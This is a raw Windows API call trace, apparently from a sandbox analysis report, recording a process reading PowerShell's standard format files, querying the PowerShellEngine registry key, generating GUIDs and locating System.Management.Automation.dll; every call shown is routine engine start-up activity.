	[0285.229] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0285.229] SetErrorMode (uMode=0x1) returned 0x1
	[0285.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0285.229] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x304) returned 0x0
	[0285.229] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0
	[0285.229] CoTaskMemAlloc (cb=0x5a) returned 0x1b9042e0
	[0285.229] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x1b9042e0, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0
	[0285.230] CoTaskMemFree (pv=0x1b9042e0) 
	[0285.230] RegCloseKey (hKey=0x304) returned 0x0
	[0285.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0285.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0285.242] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xd69ece8c, Data2=0x7a02, Data3=0x4af4, Data4=([0]=0x8a, [1]=0x63, [2]=0x9e, [3]=0x3b, [4]=0x9a, [5]=0x7e, [6]=0x44, [7]=0x2))) returned 0x0
	[0285.242] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x97508e26, Data2=0xc6e4, Data3=0x40fe, Data4=([0]=0x99, [1]=0x10, [2]=0x8f, [3]=0x71, [4]=0x29, [5]=0x52, [6]=0xd, [7]=0xd5))) returned 0x0
	[0285.242] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x69aa4a61, Data2=0x3266, Data3=0x4073, Data4=([0]=0xa3, [1]=0x1b, [2]=0xed, [3]=0x27, [4]=0xf7, [5]=0xa4, [6]=0x31, [7]=0xe))) returned 0x0
	[0285.242] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xaaba3a2b, Data2=0xe17e, Data3=0x44d2, Data4=([0]=0xbc, [1]=0xc7, [2]=0x44, [3]=0xd2, [4]=0x16, [5]=0xc6, [6]=0x9f, [7]=0x66))) returned 0x0
	[0285.243] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x50d08cab, Data2=0x242a, Data3=0x469d, Data4=([0]=0x94, [1]=0x47, [2]=0xb5, [3]=0x58, [4]=0x86, [5]=0xf7, [6]=0xcb, [7]=0x9e))) returned 0x0
	[0285.243] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x149af099, Data2=0x72a4, Data3=0x4bac, Data4=([0]=0x9a, [1]=0x9, [2]=0xcd, [3]=0xd3, [4]=0xf9, [5]=0x7, [6]=0xf8, [7]=0xbd))) returned 0x0
	[0285.243] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.243] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x9dce7939, Data2=0xe676, Data3=0x41f6, Data4=([0]=0x9a, [1]=0x63, [2]=0x13, [3]=0x4c, [4]=0x8a, [5]=0x22, [6]=0x9f, [7]=0xc3))) returned 0x0
	[0285.244] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.244] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.244] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xc18d843b, Data2=0xca42, Data3=0x401e, Data4=([0]=0xa2, [1]=0x8a, [2]=0xa3, [3]=0xa3, [4]=0xb3, [5]=0x84, [6]=0xbf, [7]=0x86))) returned 0x0
	[0285.245] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x99af2df5, Data2=0x36c8, Data3=0x4333, Data4=([0]=0x8a, [1]=0x95, [2]=0x7a, [3]=0xd9, [4]=0x1a, [5]=0x10, [6]=0xbd, [7]=0xd5))) returned 0x0
	[0285.245] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xfec069a6, Data2=0xeaac, Data3=0x4b86, Data4=([0]=0x99, [1]=0x34, [2]=0xc, [3]=0x7b, [4]=0x90, [5]=0x65, [6]=0xa1, [7]=0x66))) returned 0x0
	[0285.245] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x9e36f4ff, Data2=0xac5b, Data3=0x42d7, Data4=([0]=0xac, [1]=0x28, [2]=0xd3, [3]=0x5b, [4]=0x51, [5]=0x6e, [6]=0x66, [7]=0x41))) returned 0x0
	[0285.245] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.245] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x304505f6, Data2=0x8779, Data3=0x4082, Data4=([0]=0xbe, [1]=0x45, [2]=0xe6, [3]=0x1f, [4]=0x3f, [5]=0xdd, [6]=0x17, [7]=0xf6))) returned 0x0
	[0285.246] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.246] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.246] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.246] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.246] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.246] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x73361924, Data2=0xd4aa, Data3=0x47b7, Data4=([0]=0xa0, [1]=0x73, [2]=0xcc, [3]=0xe8, [4]=0x7, [5]=0x44, [6]=0xe7, [7]=0x21))) returned 0x0
	[0285.246] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xe8c82784, Data2=0x27b0, Data3=0x4ab0, Data4=([0]=0xa1, [1]=0x5b, [2]=0x3e, [3]=0x27, [4]=0x21, [5]=0xb4, [6]=0xcc, [7]=0xbc))) returned 0x0
	[0285.247] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xca205f72, Data2=0xe162, Data3=0x46f6, Data4=([0]=0xbd, [1]=0x77, [2]=0x5b, [3]=0x3, [4]=0xf5, [5]=0xce, [6]=0x40, [7]=0xa6))) returned 0x0
	[0285.247] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xc2421c66, Data2=0xcd0f, Data3=0x4fe2, Data4=([0]=0x96, [1]=0xcc, [2]=0xcc, [3]=0xd6, [4]=0xda, [5]=0x10, [6]=0x49, [7]=0x29))) returned 0x0
	[0285.247] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x60b92884, Data2=0xac0e, Data3=0x41e9, Data4=([0]=0x8d, [1]=0xbf, [2]=0xc5, [3]=0xfd, [4]=0x42, [5]=0xa3, [6]=0xfb, [7]=0x5b))) returned 0x0
	[0285.247] VirtualQuery (in: lpAddress=0x12c180, lpBuffer=0x12d040, dwLength=0x30 | out: lpBuffer=0x12d040*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.247] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x4173577b, Data2=0x4ff1, Data3=0x4300, Data4=([0]=0x8c, [1]=0xf, [2]=0x92, [3]=0xdd, [4]=0x94, [5]=0x8b, [6]=0x1c, [7]=0xeb))) returned 0x0
	[0285.247] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xf859c708, Data2=0x446e, Data3=0x470f, Data4=([0]=0x8c, [1]=0x76, [2]=0xca, [3]=0x67, [4]=0x48, [5]=0x6e, [6]=0xd0, [7]=0xfc))) returned 0x0
	[0285.248] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xdc81a73d, Data2=0x38f6, Data3=0x4cf4, Data4=([0]=0xa7, [1]=0xcd, [2]=0x81, [3]=0x15, [4]=0x5e, [5]=0xca, [6]=0x38, [7]=0x72))) returned 0x0
	[0285.248] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xb6f19001, Data2=0xb7ad, Data3=0x4bb7, Data4=([0]=0xa7, [1]=0x69, [2]=0xaa, [3]=0x95, [4]=0x47, [5]=0x3c, [6]=0xd2, [7]=0xda))) returned 0x0
	[0285.248] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xc314769, Data2=0x77e8, Data3=0x4fcf, Data4=([0]=0x9d, [1]=0x41, [2]=0xa3, [3]=0x93, [4]=0xb0, [5]=0xc6, [6]=0x24, [7]=0x5))) returned 0x0
	[0285.248] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xc7a9f25a, Data2=0x160c, Data3=0x4b88, Data4=([0]=0x95, [1]=0x6f, [2]=0x99, [3]=0x4c, [4]=0x3c, [5]=0xc8, [6]=0x44, [7]=0x8c))) returned 0x0
	[0285.248] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xe8ff4f98, Data2=0x74b9, Data3=0x4eb2, Data4=([0]=0xbd, [1]=0xfa, [2]=0xc, [3]=0x5f, [4]=0x4, [5]=0xb8, [6]=0x71, [7]=0x41))) returned 0x0
	[0285.249] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x4e8c9ddc, Data2=0xfaa9, Data3=0x4db9, Data4=([0]=0x94, [1]=0xca, [2]=0xa3, [3]=0xb2, [4]=0x6e, [5]=0xd9, [6]=0x5f, [7]=0x19))) returned 0x0
	[0285.249] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x4938f7b2, Data2=0x28cc, Data3=0x4513, Data4=([0]=0xa8, [1]=0xa0, [2]=0x72, [3]=0xbc, [4]=0xd7, [5]=0x16, [6]=0xe8, [7]=0xbf))) returned 0x0
	[0285.249] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xeb2b460d, Data2=0x6468, Data3=0x49fa, Data4=([0]=0xa3, [1]=0xef, [2]=0x39, [3]=0xd3, [4]=0xd1, [5]=0x2b, [6]=0x82, [7]=0xfd))) returned 0x0
	[0285.249] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xefa4219c, Data2=0x2444, Data3=0x4065, Data4=([0]=0xa6, [1]=0xc1, [2]=0xdc, [3]=0xe7, [4]=0xa8, [5]=0x5b, [6]=0xfa, [7]=0x6e))) returned 0x0
	[0285.250] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x694c1fb3, Data2=0x13df, Data3=0x4835, Data4=([0]=0x9b, [1]=0xa5, [2]=0xf7, [3]=0x97, [4]=0xac, [5]=0x7a, [6]=0xe, [7]=0x23))) returned 0x0
	[0285.250] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x3f88f1de, Data2=0x4e0b, Data3=0x4a76, Data4=([0]=0x9c, [1]=0x3f, [2]=0xaa, [3]=0x8d, [4]=0xae, [5]=0x38, [6]=0xf7, [7]=0xa8))) returned 0x0
	[0285.250] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xf4b2bbf2, Data2=0x7859, Data3=0x40e5, Data4=([0]=0x9c, [1]=0x40, [2]=0x4b, [3]=0xd1, [4]=0x21, [5]=0x2, [6]=0x78, [7]=0xdb))) returned 0x0
	[0285.250] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x5031e0b2, Data2=0xa94a, Data3=0x4ee8, Data4=([0]=0xa9, [1]=0xd1, [2]=0x78, [3]=0x23, [4]=0x6e, [5]=0xb8, [6]=0x5a, [7]=0xe9))) returned 0x0
	[0285.250] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xa4367a2b, Data2=0x6672, Data3=0x4734, Data4=([0]=0xbf, [1]=0x72, [2]=0x57, [3]=0xad, [4]=0xc5, [5]=0x1c, [6]=0xc9, [7]=0xc3))) returned 0x0
	[0285.251] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x8dcb3dde, Data2=0xaa00, Data3=0x4473, Data4=([0]=0x92, [1]=0xb5, [2]=0xb3, [3]=0x46, [4]=0x76, [5]=0x91, [6]=0x19, [7]=0xcb))) returned 0x0
	[0285.251] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xee2d9f17, Data2=0x1831, Data3=0x4284, Data4=([0]=0x8b, [1]=0xcb, [2]=0x15, [3]=0x3a, [4]=0xf2, [5]=0xc4, [6]=0x3d, [7]=0xa9))) returned 0x0
	[0285.251] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x44002d40, Data2=0xe710, Data3=0x401e, Data4=([0]=0x90, [1]=0x99, [2]=0x86, [3]=0xdb, [4]=0x60, [5]=0x18, [6]=0x8c, [7]=0x8a))) returned 0x0
	[0285.251] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.252] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.252] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.252] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x60931f5c, Data2=0xfd69, Data3=0x4555, Data4=([0]=0x8b, [1]=0xf1, [2]=0x87, [3]=0xce, [4]=0x33, [5]=0x70, [6]=0x55, [7]=0x49))) returned 0x0
	[0285.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0285.253] SetErrorMode (uMode=0x1) returned 0x1
	[0285.253] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0285.253] GetFileType (hFile=0x1d0) returned 0x1
	[0285.253] SetErrorMode (uMode=0x1) returned 0x1
	[0285.253] GetFileType (hFile=0x1d0) returned 0x1
	[0285.254] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e41980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e41980*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.254] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e41980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e41980*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.254] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e41980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e41980*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.254] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e41980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e41980*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.254] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e41980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e41980*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.255] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e41980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e41980*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.255] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e41980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e41980*, lpNumberOfBytesRead=0x12d258*=0x119, lpOverlapped=0x0) returned 1
	[0285.255] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e41980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e41980*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0285.255] CloseHandle (hObject=0x1d0) returned 1
	[0285.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0285.255] SetErrorMode (uMode=0x1) returned 0x1
	[0285.256] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0285.256] SetErrorMode (uMode=0x1) returned 0x1
	[0285.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0285.256] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x1d0) returned 0x0
	[0285.256] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0
	[0285.256] CoTaskMemAlloc (cb=0x5a) returned 0x37ed30
	[0285.256] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x37ed30, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0
	[0285.256] CoTaskMemFree (pv=0x37ed30) 
	[0285.257] RegCloseKey (hKey=0x1d0) returned 0x0
	[0285.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0285.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0285.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.258] VirtualQuery (in: lpAddress=0x12bd80, lpBuffer=0x12cc40, dwLength=0x30 | out: lpBuffer=0x12cc40*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.258] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xd5df208, Data2=0x70bb, Data3=0x46b2, Data4=([0]=0x87, [1]=0x1b, [2]=0xd, [3]=0xbd, [4]=0x92, [5]=0x9d, [6]=0x3b, [7]=0x4d))) returned 0x0
	[0285.259] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.259] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x1124da35, Data2=0xa90d, Data3=0x4fa0, Data4=([0]=0x86, [1]=0x3a, [2]=0xf6, [3]=0xbd, [4]=0xb6, [5]=0x84, [6]=0x0, [7]=0x1))) returned 0x0
	[0285.259] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xcabf9eef, Data2=0x2c63, Data3=0x4d5f, Data4=([0]=0xa8, [1]=0xd7, [2]=0xbb, [3]=0x15, [4]=0x23, [5]=0xd4, [6]=0x3e, [7]=0x88))) returned 0x0
	[0285.259] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x4b0dc43a, Data2=0xf85b, Data3=0x4531, Data4=([0]=0x93, [1]=0xc1, [2]=0x8c, [3]=0x9c, [4]=0xb1, [5]=0xa9, [6]=0x75, [7]=0x78))) returned 0x0
	[0285.260] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.260] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
